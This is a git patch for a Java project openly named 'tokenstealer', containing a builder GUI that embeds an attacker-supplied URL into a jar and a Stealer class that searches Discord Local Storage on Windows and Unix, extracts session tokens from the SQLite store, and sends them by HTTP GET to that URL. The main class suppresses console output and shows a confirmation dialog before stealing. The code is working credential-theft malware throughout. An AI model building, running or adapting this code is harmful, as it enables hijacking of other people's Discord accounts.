From e174326e16e056b98799b8771c5c7315839b4cee Mon Sep 17 00:00:00 2001 From: romangraef Date: Tue, 13 Feb 2018 14:46:26 +0100 Subject: Initial commit --- src/main/java/META-INF/MANIFEST.MF | 3 + src/main/java/de/romjaki/tokenstealer/Main.java | 43 +++++++ .../de/romjaki/tokenstealer/builder/BuildJar.java | 43 +++++++ .../de/romjaki/tokenstealer/builder/Builder.java | 52 ++++++++ .../de/romjaki/tokenstealer/builder/Config.java | 34 +++++ .../de/romjaki/tokenstealer/stealer/Stealer.java | 143 +++++++++++++++++++++ 6 files changed, 318 insertions(+) create mode 100644 src/main/java/META-INF/MANIFEST.MF create mode 100644 src/main/java/de/romjaki/tokenstealer/Main.java create mode 100644 src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java create mode 100644 src/main/java/de/romjaki/tokenstealer/builder/Builder.java create mode 100644 src/main/java/de/romjaki/tokenstealer/builder/Config.java create mode 100644 src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java (limited to 'src/main') diff --git a/src/main/java/META-INF/MANIFEST.MF b/src/main/java/META-INF/MANIFEST.MF new file mode 100644 index 0000000..ac9375a --- /dev/null +++ b/src/main/java/META-INF/MANIFEST.MF @@ -0,0 +1,3 @@ +Manifest-Version: 1.0 +Main-Class: de.romjaki.tokenstealer.Main + diff --git a/src/main/java/de/romjaki/tokenstealer/Main.java b/src/main/java/de/romjaki/tokenstealer/Main.java new file mode 100644 index 0000000..80e0942 --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/Main.java @@ -0,0 +1,43 @@ +package de.romjaki.tokenstealer; + +import de.romjaki.tokenstealer.builder.Builder; +import de.romjaki.tokenstealer.builder.Config; +import de.romjaki.tokenstealer.stealer.Stealer; + +import javax.swing.*; +import java.io.OutputStream; +import java.io.PrintStream; +import java.util.Objects; + +import static javax.swing.WindowConstants.EXIT_ON_CLOSE; + +public class Main { + public static void main(String[] args) { + PrintStream nullStream = new PrintStream(new OutputStream() { + @Override + public void write(int i) { + } + }); + if (!Objects.equals(System.getenv("DEBUG_DISCORDTS"), "true")) { + System.setOut(nullStream); + System.setErr(nullStream); + } + Config.load(args); + if (Config.INSTANCE == null) { + Builder builder = new Builder(); + builder.setDefaultCloseOperation(EXIT_ON_CLOSE); + builder.setVisible(true); + } else if ( + JOptionPane.showConfirmDialog( + null, + "I'm gonna send your discord token(s) to " + + Config.INSTANCE.getRequest() + + ". Are you okay with this?", + "WARNING", + JOptionPane.OK_CANCEL_OPTION, JOptionPane.ERROR_MESSAGE + ) == JOptionPane.OK_OPTION) { + Stealer.steal(); + } + } + +} diff --git a/src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java b/src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java new file mode 100644 index 0000000..c6224ba --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/builder/BuildJar.java @@ -0,0 +1,43 @@ +package de.romjaki.tokenstealer.builder; + +import java.io.File; +import java.io.IOException; +import java.net.URI; +import java.net.URISyntaxException; +import java.nio.file.*; +import java.util.HashMap; + + +public class BuildJar { + static void buildJar(String request, File target) { + if (target == null) return; + try { + Files.copy( + Paths.get(getCurrentJar()), + Paths.get(target.toURI()), + StandardCopyOption.REPLACE_EXISTING + ); + } catch (URISyntaxException | IOException e) { + e.printStackTrace(); + return; + } + URI fileUri = target.toURI(); + try (FileSystem fs = + FileSystems.newFileSystem( + new URI("jar:" + fileUri.getScheme(), fileUri.getPath(), null), + new HashMap() {{ + put("create", "false"); + }}, + null)) { + Path path = fs.getPath("/request"); + Files.write(path, request.getBytes()); + } catch (IOException | URISyntaxException e) { + e.printStackTrace(); + } + + } + + private static URI getCurrentJar() throws URISyntaxException { + return BuildJar.class.getProtectionDomain().getCodeSource().getLocation().toURI(); + } +} diff --git a/src/main/java/de/romjaki/tokenstealer/builder/Builder.java b/src/main/java/de/romjaki/tokenstealer/builder/Builder.java new file mode 100644 index 0000000..2d19e25 --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/builder/Builder.java @@ -0,0 +1,52 @@ +package de.romjaki.tokenstealer.builder; + +import javax.swing.*; +import java.awt.*; +import java.io.File; + +public class Builder extends JFrame { + public static final String PLACEHOLDER_HINT = "Use %s as placeholder for the token"; + public static final String COPYRIGHT = "COPYRIGHT: MAINZ DAZ IS!"; + private JTextField requestField; + private JPanel requestPanel; + private JLabel requestLabel; + private JButton generateButton; + + public Builder() { + super("Token stealer"); + setLayout(new GridLayout(0, 1)); + add(generateRequestField()); + add(generateGenerateButton()); + pack(); + } + + private Component generateGenerateButton() { + generateButton = new JButton("Generate!"); + generateButton.setToolTipText(COPYRIGHT); + generateButton.addActionListener(ignored -> BuildJar.buildJar(requestField.getText(), showSaveDialog())); + return generateButton; + } + + private File showSaveDialog() { + JFileChooser chooser = new JFileChooser(); + switch (chooser.showSaveDialog(this)) { + case JFileChooser.APPROVE_OPTION: + return chooser.getSelectedFile(); + case JFileChooser.CANCEL_OPTION: + case JFileChooser.ERROR_OPTION: + default: + return null; + } + } + + private Component generateRequestField() { + requestPanel = new JPanel(new GridLayout()); + requestLabel = new JLabel("Request url:"); + requestLabel.setToolTipText(PLACEHOLDER_HINT); + requestField = new JTextField(40); + requestField.setToolTipText(PLACEHOLDER_HINT); + requestPanel.add(requestLabel); + requestPanel.add(requestField); + return requestPanel; + } +} diff --git a/src/main/java/de/romjaki/tokenstealer/builder/Config.java b/src/main/java/de/romjaki/tokenstealer/builder/Config.java new file mode 100644 index 0000000..ea547f7 --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/builder/Config.java @@ -0,0 +1,34 @@ +package de.romjaki.tokenstealer.builder; + +import java.util.Scanner; + +public class Config { + + public static Config INSTANCE; + + private String request; + + public Config(String request) { + this.request = request; + } + + private static Config getConfig() { + try (Scanner scanner = new Scanner(Config.class.getResourceAsStream("/request")) + .useDelimiter("\\A")) { + return new Config(scanner.next()); + } catch (NullPointerException e) { + return null; + } + } + + public static Config load(String[] args) { + if (args.length == 2 && args[0].equals("--url")) { + return INSTANCE = new Config(args[1]); + } + return INSTANCE = getConfig(); + } + + public String getRequest() { + return request; + } +} diff --git a/src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java b/src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java new file mode 100644 index 0000000..d595ccd --- /dev/null +++ b/src/main/java/de/romjaki/tokenstealer/stealer/Stealer.java @@ -0,0 +1,143 @@ +package de.romjaki.tokenstealer.stealer; + +import de.romjaki.tokenstealer.builder.Config; + +import java.io.File; +import java.io.IOException; +import java.net.HttpURLConnection; +import java.net.URL; +import java.nio.file.*; +import java.nio.file.attribute.BasicFileAttributes; +import java.sql.*; +import java.util.ArrayList; +import java.util.Collections; +import java.util.List; +import java.util.stream.Stream; + +public class Stealer { + private static final String UNIX_LOCALSTORAGE = "glob:" + System.getenv("HOME") + "/.config/discord*/Local Storage/*discordapp*_0.localstorage"; + private static final String WINDOWS_LOCALSTORAGE = "glob:" + System.getenv("APPDATA") + "\\discord*\\Local Storage\\*discordapp*_0.localstorage"; + + public static void steal() { + try { + Class.forName("org.sqlite.JDBC"); + } catch (ClassNotFoundException e) { + e.printStackTrace(); + return; + } + getDiscordLocations() + .stream() + .peek(System.out::println) + .map(Stealer::copy) + .map(Path::toFile) + .map(Stealer::sqliteConnect) + .flatMap(Stealer::getToken) + .forEach(Stealer::sendToken); + } + + private static Path copy(Path from) { + try { + Path to = Files.createTempFile(from.getParent(), "backup-", ".localstorage"); + Files.copy(from, to, StandardCopyOption.REPLACE_EXISTING); + return to; + } catch (IOException e) { + e.printStackTrace(); + } + return from; + } + + private static Connection sqliteConnect(File file) { + try { + return DriverManager.getConnection("jdbc:sqlite:" + file.getCanonicalPath()); + } catch (SQLException | IOException e) { + e.printStackTrace(); + } + return null; + } + + private static void sendToken(String token) { + System.out.println("Found token: " + token); + try { + HttpURLConnection conn = (HttpURLConnection) + new URL(String.format(Config.INSTANCE.getRequest(), token)) + .openConnection(); + conn.setRequestMethod("GET"); + conn.getInputStream().read(); + } catch (IOException e) { + e.printStackTrace(); + } + } + + private static Stream getToken(Connection connection) { + try { + Statement stmt = connection.createStatement(); + ResultSet result = stmt.executeQuery("SELECT key, value FROM ItemTable WHERE key='token'"); + Stream.Builder builder = Stream.builder(); + while (result.next()) { + byte[] blob = result.getBytes("value"); + byte[] buffer = new byte[blob.length / 2]; + int i = -1; + while (++i < buffer.length) + buffer[i] = blob[i * 2]; + builder.add(new String(buffer).replace("\"", "")); + } + return builder.build(); + } catch (SQLException e) { + e.printStackTrace(); + } + return Stream.of(); + } + + + private static List getDiscordLocations() { + List matches = new ArrayList<>(); + matches.addAll(getUnixDiscordLocations()); + matches.addAll(getWindowsDiscordLocations()); + return matches; + } + + private static List globRecurse(String glob, String start) { + try { + return globRecurse(glob, Paths.get(start)); + } catch (Exception e) { + return Collections.emptyList(); + } + } + + private static List globRecurse(String glob, Path path) { + List matches = new ArrayList<>(); + try { + PathMatcher unixMatcher = FileSystems.getDefault() + .getPathMatcher(glob); + Files.walkFileTree(path, new SimpleFileVisitor() { + @Override + public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) { + System.out.print(file); + if (unixMatcher.matches(file)) { + System.out.println("[FOUND]"); + matches.add(file); + } else { + System.out.println("[NOT FOUND]"); + } + return FileVisitResult.CONTINUE; + } + + @Override + public FileVisitResult visitFileFailed(Path file, IOException exc) { + return FileVisitResult.CONTINUE; + } + }); + } catch (Exception e) { + e.printStackTrace(); + } + return matches; + } + + private static List getWindowsDiscordLocations() { + return globRecurse(WINDOWS_LOCALSTORAGE, System.getenv("APPDATA")); + } + + private static List getUnixDiscordLocations() { + return globRecurse(UNIX_LOCALSTORAGE, System.getenv("HOME") + "/.config"); + } +} -- cgit